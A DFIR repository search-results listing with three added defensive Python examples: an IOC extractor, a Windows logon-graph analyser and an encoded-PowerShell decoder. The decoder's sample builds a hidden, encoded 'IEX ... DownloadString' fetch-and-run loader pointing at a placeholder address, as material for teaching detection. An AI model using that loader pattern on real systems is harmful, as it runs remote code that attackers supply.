Awesome Open Source
Search results for dfir
308 search results found
H4cker
⭐
15,693
This repository is primarily maintained by Omar Santos (@santosomar) and includes thousands of resources related to ethical hacking, bug bounties, digital forensics and incident response (DFIR), artificial intelligence security, vulnerability research, exploit development, reverse engineering, and more.
My Arsenal Of Aws Security Tools
⭐
8,549
List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc.
Awesome Incident Response
⭐
6,852
A curated list of tools for incident response
Lolbas
⭐
6,294
Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts)
Zeek
⭐
5,731
Zeek is a powerful network analysis framework that is much different from the typical IDS you may know.
Detectionlab
⭐
4,486
Automate the creation of a lab environment complete with security tooling and logging best practices
Threathunter Playbook
⭐
3,826
A community-driven, open-source project to share detection logic, adversary tradecraft and resources to make detection development more efficient.
Awesome Forensics
⭐
3,575
A curated list of awesome forensic analysis tools and resources
Thehive
⭐
3,216
TheHive: a Scalable, Open Source and Free Security Incident Response Platform
Intelowl
⭐
3,108
IntelOwl: manage your Threat Intelligence at scale
Loki
⭐
3,106
Loki - Simple IOC and YARA Scanner
Logontracer
⭐
2,619
Investigate malicious Windows logon by visualizing and analyzing Windows event log
Chainsaw
⭐
2,519
Rapidly Search and Hunt through Windows Forensic Artefacts
Timesketch
⭐
2,435
Collaborative forensic timeline analysis
Sysmon Modular
⭐
2,364
A repository of sysmon configuration modules
Signature Base
⭐
2,187
YARA signature and IOC database for my scanners and tools
Evtx Attack Samples
⭐
2,124
Windows Events Attack Samples
Cyberchef Recipes
⭐
1,920
A list of cyber-chef recipes and curated links
Hayabusa
⭐
1,800
Hayabusa (隼) is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs.
Data
⭐
1,585
APTnotes data
Lolbas
⭐
1,572
Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts)
Yeti
⭐
1,568
Your Everyday Threat Intelligence
Malice
⭐
1,429
VirusTotal Wanna Be - Now with 100% more Hipster
Blue Team Notes
⭐
1,344
You didn't think I'd go and leave the blue team out, right?
Matano
⭐
1,259
Open source security data lake for threat hunting, detection & response, and cybersecurity analytics at petabyte scale on AWS
Cortex
⭐
1,237
Cortex: a Powerful Observable Analysis and Active Response Engine
Digital Forensics Guide
⭐
1,232
Digital Forensics Guide. Learn all about Digital Forensics, Computer Forensics, Mobile device Forensics, Network Forensics, and Database Forensics.
Beagle
⭐
1,171
Beagle is an incident response and digital forensics tool which transforms security logs and data into graphs.
Threathunting
⭐
1,088
A Splunk app mapped to MITRE ATT&CK to guide your threat hunts
Chirp
⭐
977
A DFIR tool written in Python.
Malcom
⭐
957
Malcom - Malware Communications Analyzer
Hindsight
⭐
925
Web browser forensics for Google Chrome/Chromium
Whids
⭐
921
Open Source EDR for Windows
Hunting Queries Detection Rules
⭐
865
KQL Queries. Defender For Endpoint and Azure Sentinel Hunting and Detection Queries in KQL. Out of the box KQL queries for: Advanced Hunting, Custom Detection, Analytics Rules & Hunting Rules.
Dissect
⭐
797
Dissect is a digital forensics & incident response framework and toolset that allows you to quickly access and analyse forensic artefacts from various disk and file formats, developed by Fox-IT (part of NCC Group).
Cyberthreathunting
⭐
755
A collection of resources for Threat Hunters - Sponsored by Falcon Guard
Threatingestor
⭐
730
Extract and aggregate threat intelligence.
Turbinia
⭐
689
Automation and Scaling of Digital Forensics Tools
Memlabs
⭐
689
Educational, CTF-styled labs for individuals interested in Memory Forensics
Kuiper
⭐
688
Digital Forensics Investigation Platform
Osx Security Awesome
⭐
687
A collection of OSX and iOS security resources
Forensicstools
⭐
682
A list of free and open forensics analysis tools and other resources
Mac_apt
⭐
675
macOS (& iOS) Artifact Parsing Tool
Diffy
⭐
635
⛔ (DEPRECATED) Diffy is a triage tool used during cloud-centric security incidents, to help digital forensics and incident response (DFIR) teams quickly identify suspicious hosts on which to focus their response.
Lookyloo
⭐
627
Lookyloo is a web interface that allows users to capture a website page and then display a tree of domains that call each other.
Azurehunter
⭐
626
A Cloud Forensics Powershell module to run threat hunting playbooks on data from Azure and O365
Linuxforensics
⭐
611
Everything related to Linux Forensics
Ileapp
⭐
586
iOS Logs, Events, And Plist Parser
Uac
⭐
550
UAC is a Live Response collection script for Incident Response that makes use of native binaries and tools to automate the collection of AIX, Android, ESXi, FreeBSD, Linux, macOS, NetBSD, NetScaler, OpenBSD and Solaris systems artifacts.
Sysmon Config
⭐
529
Advanced Sysmon configuration, Installer & Auto Updater with high-quality event tracing
Awesome Event Ids
⭐
515
Collection of Event ID resources useful for Digital Forensics and Incident Response
Threat Hunting And Detection
⭐
509
Repository for threat hunting and detection queries, etc. for Defender for Endpoint and Microsoft Sentinel in KQL(Kusto Query Language).
Dfirartifactmuseum
⭐
506
The goal of this repo is to archive artifacts from all versions of various OSes and categorize them by type. This helps with artifact validation and increases access to artifacts that may no longer be readily available.
Recuperabit
⭐
499
A tool for forensic file system reconstruction.
Wela
⭐
494
WELA (Windows Event Log Analyzer): The Swiss Army knife for Windows Event Logs! ゑ羅(ウェラ)
Iocextract
⭐
484
Defanged Indicator of Compromise (IOC) Extractor.
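The one-line description above hides the two steps every extractor of this kind performs: refang the text (turn `hxxp://evil[.]com` back into `http://evil.com`) and only then run indicator patterns over it. The following is an added example written for this page, not code from the iocextract project; the analyst note it parses is constructed, and the defanging conventions and regexes are the editor's own, not the project's.

```python
import re
from urllib.parse import urlparse

# Constructed sample analyst note (not real IOCs). It is defanged so it is safe
# to paste into tickets, which is exactly why extraction must refang first.
SAMPLE_NOTE = """
C2 observed at hxxp://evil-updates[.]example[.]com/gate.php and hxxps://10[.]0[.]0[.]5:8443/
Second stage from 192.168[.]1[.]100, mail from phisher[at]bad-domain[.]net
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
"""

# Common defanging conventions seen in reports and mailing lists (assumed set).
DEFANG_PATTERNS = [
    (r"\[\.\]", "."), (r"\(\.\)", "."), (r"\{\.\}", "."),
    (r"\[dot\]", "."), (r"\(dot\)", "."),
    (r"\[at\]", "@"), (r"\(at\)", "@"),
    (r"\[:\]", ":"),
]
HXXP_RE = re.compile(r"\bh[x]{2}p(s?)://", re.IGNORECASE)

IPV4_RE = re.compile(r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b")
URL_RE = re.compile(r"\bhttps?://[^\s\"'<>]+", re.IGNORECASE)
EMAIL_RE = re.compile(r"\b[\w.+-]+@[\w-]+(?:\.[\w-]+)+\b")
SHA256_RE = re.compile(r"\b[a-fA-F0-9]{64}\b")


def refang(text: str) -> str:
    """Undo defanging so the indicator regexes below see real syntax."""
    for pattern, repl in DEFANG_PATTERNS:
        text = re.sub(pattern, repl, text, flags=re.IGNORECASE)
    return HXXP_RE.sub(r"http\1://", text)


def extract_iocs(text: str) -> dict:
    """Return sorted, de-duplicated indicators keyed by type."""
    clean = refang(text)
    urls = sorted({u.rstrip(".,;)") for u in URL_RE.findall(clean)})
    ips = sorted(set(IPV4_RE.findall(clean)))
    emails = sorted(set(EMAIL_RE.findall(clean)))
    hashes = sorted({h.lower() for h in SHA256_RE.findall(clean)})
    # Domains are derived from URL hosts and e-mail addresses rather than
    # matched free-form, which keeps "gate.php"-style false positives out.
    domains = set()
    for url in urls:
        host = urlparse(url).hostname
        if host and not IPV4_RE.fullmatch(host):
            domains.add(host)
    for email in emails:
        domains.add(email.split("@", 1)[1])
    return {"urls": urls, "domains": sorted(domains), "ips": ips,
            "emails": emails, "sha256": hashes}


if __name__ == "__main__":
    for kind, values in extract_iocs(SAMPLE_NOTE).items():
        print(f"{kind}: {values}")
```

Refanging must run before matching: an IPv4 regex never matches `10[.]0[.]0[.]5`, and a URL regex never matches `hxxps://`. Deriving domains from URL hosts and e-mail addresses instead of a bare domain pattern avoids pulling file names such as `gate.php` into the indicator list.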
Dfirtrack
⭐
464
DFIRTrack - The Incident Response Tracking Application
Purplecloud
⭐
461
A little tool to play with Azure Identity - Azure Active Directory lab creation tool
Misp Warninglists
⭐
437
Warning lists to inform users of MISP about potential false-positives or other information in indicators
Cloud Forensics Utils
⭐
418
Python library to carry out DFIR analysis on the Cloud
Aleapp
⭐
405
Android Logs Events And Protobuf Parser
Cortex Analyzers
⭐
400
Cortex Analyzers Repository
Adtimeline
⭐
398
Timeline of Active Directory changes with replication metadata
Atc React
⭐
392
A knowledge base of actionable Incident Response techniques
Dfirmindmaps
⭐
381
A repository of DFIR-related Mind Maps geared towards the visual learners!
Swap_digger
⭐
376
swap_digger is a tool used to automate Linux swap analysis during post-exploitation or forensics. It automates swap extraction and searches for Linux user credentials, web form credentials, web form emails, HTTP basic authentication, Wi-Fi SSIDs and keys, etc.
Loobins
⭐
366
Living Off the Orchard: macOS Binaries (LOOBins) is designed to provide detailed information on various built-in "living off the land" macOS binaries and how they can be used by threat actors for malicious purposes.
Memprocfs Analyzer
⭐
358
MemProcFS-Analyzer - Automated Forensic Analysis of Windows Memory Dumps for DFIR
Enablewindowslogsettings
⭐
343
Documentation and scripts to properly enable Windows event logs.
Dfir Orc
⭐
343
Forensics artefact collection tool for systems running Microsoft Windows
Ir Rescue
⭐
309
A Windows Batch script and a Unix Bash script to comprehensively collect host forensic data during incident response.
Detectionlabelk
⭐
299
DetectionLabELK is a fork from DetectionLab with ELK stack instead of Splunk.
Attackdatamap
⭐
279
A data-source assessment at the event level to show potential coverage of the MITRE ATT&CK framework
Forensictools
⭐
270
Collection of forensic tools
Threathunting Keywords
⭐
252
Awesome list of keywords for Threat Hunting sessions
Sharphide
⭐
251
Tool to create hidden registry keys.
Pockint
⭐
251
A portable OSINT Swiss Army Knife for DFIR/OSINT professionals 🕵️ 🕵️ 🕵️
Malwless
⭐
244
Test Blue Team detections without running any attack.
Masterparser
⭐
238
MasterParser is a powerful DFIR tool designed for analyzing and parsing Linux logs
Catalyst
⭐
237
Catalyst is an open source SOAR and ticket system that helps to automate alert handling and incident response processes
Threatpinchlookup
⭐
236
Documentation and Sharing Repository for ThreatPinch Lookup Chrome & Firefox Extension
Trawler
⭐
224
PowerShell script to help Incident Responders discover potential adversary persistence mechanisms.
Dfir Toolkit
⭐
222
CLI tools for forensic investigation of Windows artifacts
Userline
⭐
217
Query and report user logons relations from MS Windows Security Events
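Both LogonTracer (above) and Userline build the same core structure from Security log events: a graph of who logged on from where to what, from which failed-then-successful logons and one account fanning out across hosts become visible. The block below is an added example written for this page, not code from either project; the events are constructed dicts carrying only the EventData fields the logic needs (a real run would populate them from EVTX via a parser), and the thresholds are assumptions.

```python
from collections import Counter, defaultdict

# Constructed Security log events, not a real capture. 4625 = failed logon,
# 4624 = successful logon. LogonType 3 = network, 10 = RDP, 2 = local console.
EVENTS = [
    {"TimeCreated": "2024-03-01T08:00:01", "EventID": 4625, "Computer": "FS01",
     "TargetUserName": "jdoe", "IpAddress": "10.0.0.23", "LogonType": 3},
    {"TimeCreated": "2024-03-01T08:00:02", "EventID": 4625, "Computer": "FS01",
     "TargetUserName": "jdoe", "IpAddress": "10.0.0.23", "LogonType": 3},
    {"TimeCreated": "2024-03-01T08:00:03", "EventID": 4625, "Computer": "FS01",
     "TargetUserName": "jdoe", "IpAddress": "10.0.0.23", "LogonType": 3},
    {"TimeCreated": "2024-03-01T08:00:04", "EventID": 4625, "Computer": "FS01",
     "TargetUserName": "jdoe", "IpAddress": "10.0.0.23", "LogonType": 3},
    {"TimeCreated": "2024-03-01T08:00:05", "EventID": 4624, "Computer": "FS01",
     "TargetUserName": "jdoe", "IpAddress": "10.0.0.23", "LogonType": 3},
    {"TimeCreated": "2024-03-01T08:05:10", "EventID": 4624, "Computer": "FS01",
     "TargetUserName": "svc_backup", "IpAddress": "10.0.0.23", "LogonType": 3},
    {"TimeCreated": "2024-03-01T08:06:40", "EventID": 4624, "Computer": "DC01",
     "TargetUserName": "svc_backup", "IpAddress": "10.0.0.23", "LogonType": 3},
    {"TimeCreated": "2024-03-01T08:09:15", "EventID": 4624, "Computer": "WS07",
     "TargetUserName": "svc_backup", "IpAddress": "10.0.0.23", "LogonType": 10},
    {"TimeCreated": "2024-03-01T08:30:00", "EventID": 4624, "Computer": "WS07",
     "TargetUserName": "alice", "IpAddress": "-", "LogonType": 2},
    {"TimeCreated": "2024-03-01T08:31:00", "EventID": 4624, "Computer": "DC01",
     "TargetUserName": "WS07$", "IpAddress": "10.0.0.7", "LogonType": 3},
]

# Accounts that add noise to a logon graph: machine accounts ($) and built-ins.
NOISE_ACCOUNTS = {"ANONYMOUS LOGON", "SYSTEM", "LOCAL SERVICE", "NETWORK SERVICE"}


def is_user_account(name: str) -> bool:
    return name not in NOISE_ACCOUNTS and not name.endswith("$")


def build_logon_graph(events):
    """user -> Counter of (source IP, destination host, logon type) edges."""
    graph = defaultdict(Counter)
    for ev in events:
        if ev["EventID"] != 4624 or not is_user_account(ev["TargetUserName"]):
            continue
        graph[ev["TargetUserName"]][(ev["IpAddress"], ev["Computer"], ev["LogonType"])] += 1
    return graph


def find_failed_then_success(events, threshold=3):
    """(user, source, host, failures) where >= threshold 4625s precede a 4624."""
    failures = Counter()
    hits = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        key = (ev["TargetUserName"], ev["IpAddress"], ev["Computer"])
        if ev["EventID"] == 4625:
            failures[key] += 1
        elif ev["EventID"] == 4624 and failures[key] >= threshold:
            hits.append((*key, failures[key]))
            failures[key] = 0
    return hits


def find_lateral_movement(graph, min_hosts=2):
    """(user, source, hosts) where one source reached >= min_hosts over the network."""
    flagged = []
    for user, edges in graph.items():
        by_source = defaultdict(set)
        for src, dst, logon_type in edges:
            if logon_type in (3, 10):  # network or RemoteInteractive only
                by_source[src].add(dst)
        for src, hosts in by_source.items():
            if len(hosts) >= min_hosts:
                flagged.append((user, src, sorted(hosts)))
    return flagged


if __name__ == "__main__":
    graph = build_logon_graph(EVENTS)
    print("brute force then success:", find_failed_then_success(EVENTS))
    print("fan-out from one source:", find_lateral_movement(graph))
```

Two details matter in practice: keep the source address in the edge key (the same user from two workstations is two different stories), and drop machine accounts before counting, or every domain controller will look like a lateral-movement hub.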
Dfir O365rc
⭐
214
PowerShell module for Office 365 and Azure log collection
Varc
⭐
210
Volatile Artifact Collector collects a snapshot of volatile data from a system. It tells you what is happening on a system, and is of particular use when investigating a security incident.
Lecmd
⭐
205
Lnk Explorer Command line edition!!
Thehive4py
⭐
201
Python API Client for TheHive
Collect Memorydump
⭐
186
Collect-MemoryDump - Automated Creation of Windows Memory Snapshots for DFIR
Mde Dfir Resources
⭐
184
A curated list of resources for DFIR through Microsoft Defender for Endpoint leveraging kusto queries, powershell scripts, tools such as KAPE and THOR Cloud and more.
Pypowershellxray
⭐
184
Python script to decode common encoded PowerShell scripts
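What "common encoded PowerShell" means in practice is an `-EncodedCommand` argument (UTF-16LE text, base64) whose decoded stub often wraps a second base64 blob that is gzip- or deflate-compressed. The block below is an added example written for this page, not the pyPowerShellXray script; it builds its own sample command line the way a loader would (the stage-2 URL uses a documentation address and is constructed), then peels both layers. The flag regex covers the common abbreviations only; real PowerShell accepts any unambiguous prefix of the parameter name.

```python
import base64
import gzip
import re
import zlib

# Constructed stage-2 one-liner; 198.51.100.0/24 is a documentation range.
STAGE2 = 'IEX (New-Object Net.WebClient).DownloadString("http://198.51.100.10/stage2.ps1")'

# -e / -ec / -en / -enc / -encodedcommand followed by a base64 argument.
ENC_FLAG_RE = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
FROM_B64_RE = re.compile(r"""FromBase64String\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""", re.I)


def encode_command(script: str) -> str:
    """What powershell.exe expects after -EncodedCommand: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


def build_sample_cmdline() -> str:
    """gzip+base64 the real script, wrap it in a decompression stub, encode the stub."""
    gz_b64 = base64.b64encode(gzip.compress(STAGE2.encode())).decode()
    stub = ('IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream('
            '(New-Object IO.MemoryStream(,[Convert]::FromBase64String("' + gz_b64 + '"))),'
            '[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()')
    return "powershell.exe -NoP -W Hidden -Enc " + encode_command(stub)


def _decode_blob(raw: bytes) -> str:
    """Inflate a FromBase64String payload: gzip, raw deflate, zlib, else plain text."""
    for inflate in (gzip.decompress, lambda b: zlib.decompress(b, -15), zlib.decompress):
        try:
            return inflate(raw).decode("utf-8")
        except (OSError, EOFError, zlib.error, UnicodeDecodeError):
            continue
    # Not compressed: [Text.Encoding]::Unicode payloads have a NUL every other byte.
    if len(raw) > 1 and raw[1] == 0:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def decode_encoded_command(cmdline: str):
    """Return [outer script, inner payload, ...] or None if no -Enc argument."""
    match = ENC_FLAG_RE.search(cmdline)
    if not match:
        return None
    outer = base64.b64decode(match.group(1)).decode("utf-16-le")
    layers = [outer]
    for blob in FROM_B64_RE.findall(outer):
        layers.append(_decode_blob(base64.b64decode(blob)))
    return layers


if __name__ == "__main__":
    for i, layer in enumerate(decode_encoded_command(build_sample_cmdline())):
        print(f"layer {i}: {layer}")
```

The decoder treats each `FromBase64String(...)` blob independently and tries gzip, raw deflate and zlib before falling back to text, because the stub tells you the stream class in use but a hunt query over 4688 or Sysmon event 1 command lines usually does not.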
Artifactcollector
⭐
184
🚨 The artifactcollector is a customizable agent to collect forensic artifacts on any Windows, macOS or Linux system
Emailanalyzer
⭐
183
With EmailAnalyzer you can analyze your suspicious emails. You can extract headers, links, and hashes from the .eml file and you can generate reports.
Thehitchhikersguidetodfirexperiencesfrombeginnersandexperts
⭐
176
The official repo for a project involving a crowdsourced DFIR book. The main purpose of this book is to give anyone interested an opportunity to write a chapter of a book to get their name out there, get a publication on their resume with an actual ISBN number, and ideally lower the bar for people to contribute something back to the DFIR Community. Want to write a chapter? Let me know and let's make it happen!
Mindmaps
⭐
172
#ThreatHunting #DFIR #Malware #Detection Mind Maps
Fennec
⭐
170
Artifact collection tool for *nix systems
Regrippy
⭐
166
A modern Python-3-based alternative to RegRipper
Dfir_ntfs
⭐
166
An NTFS/FAT parser for digital forensics & incident response
Pecmd
⭐
156
Prefetch Explorer Command Line
Cve 2020 0796 Lpe Poc
⭐
155
CVE-2020-0796 Local Privilege Escalation POC
1-100 of 308 search results
Copyright 2018-2024 Awesome Open Source. All rights reserved.